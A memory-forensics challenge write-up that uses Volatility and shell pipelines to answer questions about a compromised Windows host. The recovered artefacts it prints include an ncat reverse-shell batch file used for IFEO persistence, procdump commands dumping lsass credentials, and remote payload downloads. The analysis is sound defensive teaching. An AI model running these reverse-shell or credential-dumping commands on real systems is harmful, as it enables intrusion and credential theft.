<span style="color: white;">└─$ </span><span><span style="color: white;">strings SECURITYNIK-WIN-20231116-235706.dmp | </span><b><span style="color: #fcff01;">grep --perl-regexp 'https?://10.0.0.108:(443|9999)</span></b><span style="color: white;">.*' --only-matching | sort --unique | grep --perl-regexp '(\.exe|\.txt)' | sed 's/"//'
http://10.0.0.108:9999/putty_64.exe
http://10.0.0.108:9999/putty_64.exe)
http://10.0.0.108:9999/putty.exe
http://10.0.0.108:9999/putty.exe
http://10.0.0.108:9999/putty_x64.exe
http://10.0.0.108:9999/putty_x64.md5.txt</span></span>
</pre><div><br /></div></div></div><div><br /></div><div><b>Q:</b> Where is/are the executable file(s) seen in the previous question stored on the system?</div><div><b>A:</b> The executables are stored primarily in the c:\users\securitynik\Downloads folder.<br /><br /></div><div>The locations where the files were stored on the file system are visible below. Note the extra path <i>C:\TOOLS\elitewrap\original_putty.exe</i>: EliteWrap is a file binder, so a PuTTY binary was apparently being wrapped together with something else, and the <i>putty_new.exe</i> in Downloads is worth hashing and comparing against the original.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings SECURITYNIK-WIN-20231116-235706.dmp | </span><b><span style="color: #fcff01;">grep --perl-regexp 'putty.*?\.exe' | grep --ignore-case --perl-regexp "^c:.*?\.exe$"</span></b><span style="color: white;">
C:\Users\securitynik\Downloads\putty_x64 (2).exe
C:\Users\securitynik\Downloads\putty_64.exe
C:\TOOLS\elitewrap\original_putty.exe
C:\Users\securitynik\Downloads\putty.exe
C:\Users\securitynik\Downloads\putty.exe
C:\Users\securitynik\Downloads\putty_new.exe</span>
</pre><div><br /></div></div></div><div><br /></div></div><div>Extracting file objects from memory. <i>windows.filescan</i> lists every FILE_OBJECT it can find, which includes directories and other objects and not only regular files, as the counts further down show; save the output to a text file for further analysis.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.filescan > filescan.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div></div><div><br /></div><div><div><b>Q:</b> When performing a <i>filescan</i>, how many files/lines were returned?</div><div><b>A:</b> 8035 lines were returned, of which 8029 are counted as files after the header lines and the 6 entries containing non-ASCII characters are removed (see the pipeline below).</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | wc --lines
8029</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> Similarly, how many unique files were returned?</div><div><b>A:</b> 3227 unique files. Note that the 6 lines containing non-ASCII characters were excluded, and that "unique" here is computed on the first whitespace-delimited field of each path, so paths containing spaces are truncated before de-duplication.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | uniq | head --lines -6 | wc --lines
3227</span></pre></div></div><div><br /></div></div><div><b>Q:</b> What were the top 10 files/lines found. Note, in this case directory paths would also be considered as files for this purpose?</div><div><b>A:</b> </div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | uniq --count | sort --numeric-sort --reverse | head --lines=10
1480 \$Directory
469 \Program
359 \Users\securitynik\AppData\Local\Google\Chrome\User
223 \$MapAttributeValue
172 \Users\securitynik\AppData\Local\Microsoft\Edge\User
158 \CMNotify
140 \Windows\System32
109 \Windows\Registration\R000000000006.clb
107 \Endpoint
77 \Windows\System32\svchost.exe
....</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> Of these unique files, how many are text (".txt") files and what are their counts?</div><div><b>A:</b> 3 files with a .txt extension, each seen once: the XAMPP readme, the Program Compatibility Assistant launch dictionary and the PowerShell console history.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | uniq --count | sort --numeric-sort --reverse | </span><b><span style="color: #fcff01;">grep ".txt"</span></b><span style="color: white;">
1 \xampp\readme_de.txt
1 \Windows\appcompat\pca\PcaAppLaunchDic.txt
1 \Users\securitynik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</span>
</pre></div></div><div><br /></div></div><div><div>We saw above that PowerShell was a cause for concern. Maybe this "<i>ConsoleHost_history.txt</i>" file has information that helps us understand what transpired; we did not get enough insight from the command-line output alone. Keep in mind that PSReadLine only records interactive console sessions in this file, so anything run non-interactively (<i>powershell -Command</i> or <i>-File</i>, or a remoting session) will not appear in it.</div><div><br /></div><div>From the list of files returned, there also seems to be a mapped/network drive. </div><div><br /></div><div><b>Q:</b> What is the drive letter associated with the mapped/network drive?</div><div><b>A:</b> Z: </div><div><br /></div><div><b>Q:</b> What is the path of this mapped/network drive?</div><div><b>A:</b> \;Z:00000000000fc3bd\vmware-host\Shared, a VMware shared folder. The awk field split cuts the name at its first space, and VMware's shared-folders UNC is normally <i>\\vmware-host\Shared Folders</i>, so the full name is likely longer than what is shown.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | tail --lines=2 | sort --unique
\;Z:00000000000fc3bd\vmware-host\Shared</span>
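</pre></div></div><div><br /></div></div><div><div>Three of the filescan questions above (the top paths, the .txt files and the mapped drive) were answered with awk '{ print $2 }', which truncates any path containing a space. As an added example for this write-up (not code from the original post or from Volatility), the Python below matches the path between the offset and the trailing size instead, so spaces survive, and it also returns the offset to pass to <i>windows.dumpfiles --virtaddr</i> for a given file name. The sample output is constructed in the shape of the real filescan output; the "Program Files" and "User Data" paths are in it precisely to show the difference.</div><div><br /></div></div>

```python
import re
from collections import Counter

# Constructed excerpt in the shape of 'windows.filescan' output (offset, name, size).
# Paths with spaces are included on purpose: they are what the awk '$2'
# pipelines above truncate to "\Program" and "...\Chrome\User".
SAMPLE = """Volatility 3 Framework 2.5.2
Progress:  100.00\t\tPDB scanning finished
Offset\tName\tSize

0xe78bf2f82a00\t\\Users\\securitynik\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\t216
0xe78bf0000100\t\\Program Files\\Google\\Chrome\\Application\\chrome.exe\t216
0xe78bf0000200\t\\Program Files (x86)\\Nmap\\ncat.exe\t216
0xe78bf0000300\t\\Users\\securitynik\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History\t216
0xe78bf0000400\t\\Windows\\System32\\svchost.exe\t216
0xe78bf0000500\t\\Windows\\System32\\svchost.exe\t216
0xe78bf0000600\t\\xampp\\readme_de.txt\t216
0xe78bf0000700\t\\;Z:00000000000fc3bd\\vmware-host\\Shared\t216
0xe78bf0000800\t\\$Directory\t216
"""

# offset, then the name matched lazily so it may contain spaces, then the size
ROW = re.compile(r'^(0x[0-9a-fA-F]+)\s+(.+?)\s+(\d+)\s*$')

def parse_filescan(text):
    """Return (offset, path, size) tuples; banner, header and blank lines do
    not match ROW and are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append((m.group(1), m.group(2), int(m.group(3))))
    return rows

def top_paths(rows, n=10):
    """Most frequently seen full paths (directories count as paths too)."""
    return Counter(r[1] for r in rows).most_common(n)

def by_extension(rows, ext):
    """Sorted unique paths ending in the given extension, case-insensitively."""
    ext = ext.lower()
    return sorted({r[1] for r in rows if r[1].lower().endswith(ext)})

def mapped_drives(rows):
    """Names of the form '\\;X:<session id>\\server\\share' are mapped network
    drives; return {drive letter: share path}."""
    found = {}
    for _, path, _ in rows:
        m = re.match(r'^\\;([A-Za-z]):[0-9a-fA-F]*(\\.*)$', path)
        if m:
            found[m.group(1).upper() + ":"] = m.group(2)
    return found

def offset_of(rows, filename):
    """Offsets to hand to 'windows.dumpfiles --virtaddr' for a given file name."""
    return [r[0] for r in rows if r[1].rsplit("\\", 1)[-1].lower() == filename.lower()]

if __name__ == "__main__":
    rows = parse_filescan(SAMPLE)
    print(top_paths(rows, 3))
    print(by_extension(rows, ".txt"))
    print(mapped_drives(rows))
    print(offset_of(rows, "ConsoleHost_history.txt"))
```

<div><div><br /></div><div>Point parse_filescan() at the real filescan.txt and the counts are over complete paths, so a directory such as \Program Files is no longer merged with \Program Files (x86). offset_of() also avoids the manual grep-and-copy step before each dumpfiles run.</div><div><br /></div></div><div><div><div><pre>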
</pre></div></div><div><br /></div></div><div>Preparing to dump the contents of the PowerShell history file. Create a folder to store the files.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">mkdir powershell_history && ls powershell_history</span>
</pre></div></div><div><br /></div></div><div><div>Get the address of the PowerShell history from the filescan.txt file.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep "\ConsoleHost_history.txt"
0xe78bf2f82a00 \Users\securitynik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 216</span>
</pre></div></div><div><br /></div></div><div><div>Dump the address:</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir powershell_history/ --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.dumpfiles --virtaddr 0xe78bf2f82a00</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf2f82a00 ConsoleHost_history.txt file.0xe78bf2f82a00.0xe78bf66cc6d0.DataSectionObject.ConsoleHost_history.txt.dat</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What network scanning tool was being searched for via the command prompt?</div><div><b>A:</b> nmap.exe </div><div><br /></div><div><b>Q:</b> What is the command used to perform the search?</div><div><b>A:</b> "<i>dir /s c:\nmap.exe</i>"</div><div><br /></div><div><b>Q:</b> What is in this PowerShell history file? As in, reconstruct this file to get its contents.</div><div><b>A:</b> The commands that were run on the host inside the PowerShell prompt, as seen below.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat powershell_history/file.0xe78bf2f82a00.0xe78bf66cc6d0.DataSectionObject.ConsoleHost_history.txt.dat
Invoke-WebRequest -Uri http://10.0.0.106/putty.exe
dir
cd ..
dir
Invoke-WebRequest -Uri http://10.0.0.106/putty.exe putty.exe
exit
d:
cmd
exit
cd \
cd tools
cd .\SysinternalsSuite\
.\procdump.exe -ma lsass.exe c:\tmp\lsass.dmp
ps
.\procdump.exe -ma TabTip tabtip.dmp
.\procdump.exe -ma msedge.exe msedge.dmp
del *.tmp
del *.dmp
dir *.dmp
del .\notepad.dmp .\firefox.dmp
del .\FindLinks.exe
del .\firefox.dmp
cd \
cd tools
cd .\SysinternalsSuite\
del .\firefox.dmp
.\procdump.exe -ma msedge.exe c:\tmp\edge.dmp
dir c:\tmp\edge.dmp
.\procdump.exe -ma lsass.exe c:\tmp\lsass.exe.dmp
dir c:\tmp
.\procdump64.exe /?
.\procdump.exe -64 -ma lsass.exe c:\tmp\lsass.exe.dmp
.\procdump.exe -accepteula -64 -ma lsass.exe c:\tmp\lsass.exe.dmp
cls
psexec -h
cmd
cd 'C:\Program Files\'
dir
cd ..
cd '.\Program Files (x86)\'
dir
cd .\Microsoft\
dir
cd .\Edge\
dir
cd .\Application\
dir
cd .\114.0.1823.79\
dir
.\msedge.exe --proxy-server="socks5://127.0.0.1:9999"
cd "c:\Program Files (x86)\Google\Chrome\Application\"
cd "c:\Program Files (x86)\Google\Chrome\Application\"cd ..
cd ..
cd \
cd '.\Program Files\'
dir
cd .\Google\
dir
cd .\Chrome\
dir
cd .\Application\
dir
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
dir
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
cmd
dir /s c:\nmap.exe</span></pre></div></div></div><div><br /></div><div><div>Summary of file contents</div><div><br /></div><div>The history confirms some of what we saw before. Let's take a quick synopsis.</div><div><br /></div><div><i>Invoke-WebRequest</i> was used to download putty.exe. We also see attempts to dump the <i>lsass.exe</i> process, which holds the credential material (NTLM hashes, Kerberos tickets and sometimes cleartext passwords) of logged-on users. <i>procdump</i> was run several times in different forms against lsass.exe, the later attempts adding <i>-64</i> and <i>-accepteula</i>, which suggests the earlier runs did not produce the dump the actor wanted. Whether one finally succeeded is worth checking: <i>c:\tmp\lsass.dmp</i> and <i>c:\tmp\lsass.exe.dmp</i> are the paths to look for in the filescan output.</div><div><br /></div><div>One common tool used for dumping passwords is <i>mimikatz</i>; maybe we should check whether it was found in the file list. </div><div><br /></div><div><b>Q:</b> Was <i>mimikatz</i> found within this memory dump?</div><div><b>A:</b> Yes</div><div><br /></div><div><b>Q:</b> If yes, what is the path it can be found in?</div><div><b>A: </b>C:\TOOLS\mimikatz_trunk</div><div><br /></div><div>We also see attempts to dump <i>TabTip</i> and <i>msedge.exe</i> from memory using <i>procdump</i>. All <i>*.tmp</i> and <i>*.dmp</i> files were deleted along with some other files, which is anti-forensic cleanup (deleted dumps may still be recoverable from the image or from disk). We also see an attempt to use <i>msedge.exe</i> with the SOCKS proxy set up earlier; maybe that did not work, because the next attempt used <i>chrome.exe</i>. Finally, we see a search from the <i>cmd.exe</i> shell for <i>nmap.exe</i>. </div><div><br /></div><div>While we are here: a batch file (".bat") was also found.</div><div><br /></div><div><b>Q: </b>What does "ifeo" stand for?</div><div><b>A:</b> IFEO stands for Image File Execution Options, the registry key <i>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options</i>. A subkey named after an executable with a <i>Debugger</i> value makes the loader start the named "debugger" instead of the executable, passing the original image path as an argument. In this case, the batch file can be configured as the Debugger for notepad (or any other application), so whenever that application is launched the script runs and the actor regains access. The check is to list that key recursively (e.g. with <i>windows.registry.printkey.PrintKey --recurse</i>) and inspect every <i>Debugger</i> value.</div><div><br /></div><div>Learn more about IFEO here: <a href="https://www.malwarebytes.com/blog/news/2015/12/an-introduction-to-image-file-execution-options">An Introduction to Image File Execution Options | Malwarebytes Labs</a></div><div><br /></div><div>Make a directory to dump the contents of the <i>ncat-ifeo.bat</i> file.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">mkdir ncat_dump</span>
</pre></div></div><div><br /></div></div><div><div>Extract the file at that memory address.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.dumpfiles --virtaddr 0xe78bf6e4f250</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
DataSectionObject 0xe78bf6e4f250 ncat-ifeo.bat file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat</span>
</pre></div></div><div><br /></div></div><div><div><b>Q: </b>What is the virtual address of this file?</div><div><b>A:</b> The address of the <i>.bat </i>file is at <i>"0xe78bf6e4f250"</i></div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep --perl-regexp '\.bat'
</span><b><span style="color: #fcff01;">0xe78bf6e4f250 </span></b><span style="color: white;">\TOOLS\ncat-ifeo.bat 216</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What is the contents of this file?</div><div><b>A: </b>See below.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat ncat_dump/file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat
cmd.exe /c start c:\tools\ncat.exe --nodns --verbose 10.0.0.110 80 --exec cmd.exe</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What will be achieved when this command is run?</div><div><b>A: </b>Looking at the <i>ncat-ifeo.bat</i> file, we see the host is configured to send its shell (<i>cmd.exe</i>) to the device at <i>10.0.0.110 </i>on port <i>80</i>. While the port is different, this is similar to what we saw with the persistence mechanism earlier. Even more reason to conclude the attacker may be at <i>10.0.0.110</i>.</div><div><br /></div><div>When looking at the file scan, we saw two entries for <i>ncat.exe</i>.</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | grep ncat.exe
0xe78bf6aa7120 \Program Files (x86)\Nmap\ncat.exe 216
0xe78bf6ad55c0 \Program Files (x86)\Nmap\ncat.exe 216</span></pre></div></div><div><br /></div><div>We can extract both files and confirm their hashes.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6aa7120
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
ImageSectionObject 0xe78bf6aa7120 ncat.exe file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --output-dir ncat_dump/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.dumpfiles --virtaddr 0xe78bf6ad55c0
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Cache FileObject FileName Result
ImageSectionObject 0xe78bf6ad55c0 ncat.exe file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ md5sum ncat_dump/*
</span><b><span style="color: #fcff01;">89dc4c7b0477978aa3b7dfb4e7a93163</span></b><span style="color: white;"> ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.</span><span style="color: #fcff01;"><b>ncat.exe.</b></span><span style="color: white;">img
</span><b><span style="color: #fcff01;">89dc4c7b0477978aa3b7dfb4e7a93163 </span></b><span style="color: white;">ncat_dump/file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.</span><span style="color: #fcff01;"><b>ncat.exe</b></span><span style="color: white;">.img
45860d2ded9caca15c1d10e756e1a0c7 ncat_dump/file.0xe78bf6e4f250.0xe78bf66a8910.DataSectionObject.ncat-ifeo.bat.dat</span>
</pre><div><br /></div></div></div><div><br /></div></div></div><div><div><b>Q:</b> How many files are seen for <i>ncat.exe</i>?</div><div><b>A:</b> 2</div><div><br /></div><div><b>Q:</b> If you had multiple files, are these files the same?</div><div><b>A:</b> Yes. The hashes say they are.</div><div><br /></div><div><b>Q:</b> If they are, what makes you conclude so?</div><div><b>A:</b> Their md5sum hashes match.<br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">md5sum ncat_dump/*
</span><span style="color: #fcff01;"><b>89dc4c7b0477978aa3b7dfb4e7a93163</b> </span><span style="color: white;">ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
</span><b><span style="color: #fcff01;">89dc4c7b0477978aa3b7dfb4e7a93163 </span></b><span style="color: white;">ncat_dump/file.0xe78bf6ad55c0.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div><b>Q:</b> What type of "file" is this?</div><div><b>A:</b> This is a Windows 32-bit executable. Here is the file information.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">file </span></b><span style="color: white;">ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img
ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img: </span><b><span style="color: #fcff01;">PE32 executable (console)</span></b><span style="color: white;"> Intel 80386, for MS Windows, 5 sections</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What architecture (x86 or x64) was it designed for?</div><div><b>A:</b> 80386 or x86 or i386</div><div><br /></div><div><b>Q:</b> What OS is it designed to run on?</div><div><b>A:</b> Windows</div><div><br /></div><div><b>Q:</b> What type of application is it? (GUI or console)?</div><div><b>A:</b> Console Application</div><div><br /></div><div><b>Q:</b> How many sections are there in this file?</div><div><b>A:</b> 5 Sections</div><div><br /></div><div><b>Q:</b> What is/are the name(s) of the section(s) header(s)</div><div><b>A: </b></div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">objdump </span></b><span style="color: white;">ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img </span><b><span style="color: #fcff01;">--section-headers</span></b><span style="color: white;">
ncat_dump/file.0xe78bf6aa7120.0xe78bf313bdc0.ImageSectionObject.ncat.exe.img: file format pei-i386
Sections:
Idx Name Size VMA LMA File off Algn
</span><span style="color: #fcff01;"><b>0 .text</b> </span><span style="color: white;"> 000442dd 002e1000 002e1000 00000400 2**2
CONTENTS, ALLOC, LOAD, READONLY, CODE
</span><b style="color: white;"> </b><b><span style="color: #fcff01;">1 .rdata</span></b><b style="color: white;"> </b><span style="color: white;"> 0000ccce 00326000 00326000 00044800 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
</span><b><span style="color: #fcff01;">2 .data</span></b><span style="color: white;"> 00000600 00333000 00333000 00051600 2**2
CONTENTS, ALLOC, LOAD, DATA
</span><b><span style="color: #fcff01;">3 .rsrc</span></b><span style="color: white;"> 000001e0 00336000 00336000 00051c00 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA
</span><b><span style="color: #fcff01;">4 .reloc</span></b><span style="color: white;"> 00003400 00337000 00337000 00051e00 2**2
CONTENTS, ALLOC, LOAD, READONLY, DATA</span>
